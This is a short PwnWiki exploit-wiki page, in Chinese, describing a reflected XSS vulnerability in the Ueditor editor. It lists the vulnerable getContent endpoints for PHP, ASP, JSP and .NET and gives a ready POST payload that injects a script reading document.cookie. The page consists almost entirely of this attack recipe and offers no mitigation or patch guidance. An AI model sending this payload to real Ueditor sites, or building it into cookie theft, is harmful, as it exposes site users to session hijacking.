Ueditor 反射型XSS漏洞

From PwnWiki

Revision as of 13:41, 20 April 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞位置== <pre> /php/getContent.php /asp/getContent.asp /jsp/getContent.jsp /net/getContent.ashx </pre> ==XSS== POST: <pre> myEditor=<script>alert(document.cookie)</sc...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

漏洞位置

/php/getContent.php /asp/getContent.asp /jsp/getContent.jsp /net/getContent.ashx

XSS

POST:

myEditor=<script>alert(document.cookie)</script>

Retrieved from "https://pwnwiki.com/index.php?title=Ueditor_反射型XSS漏洞&oldid=1758"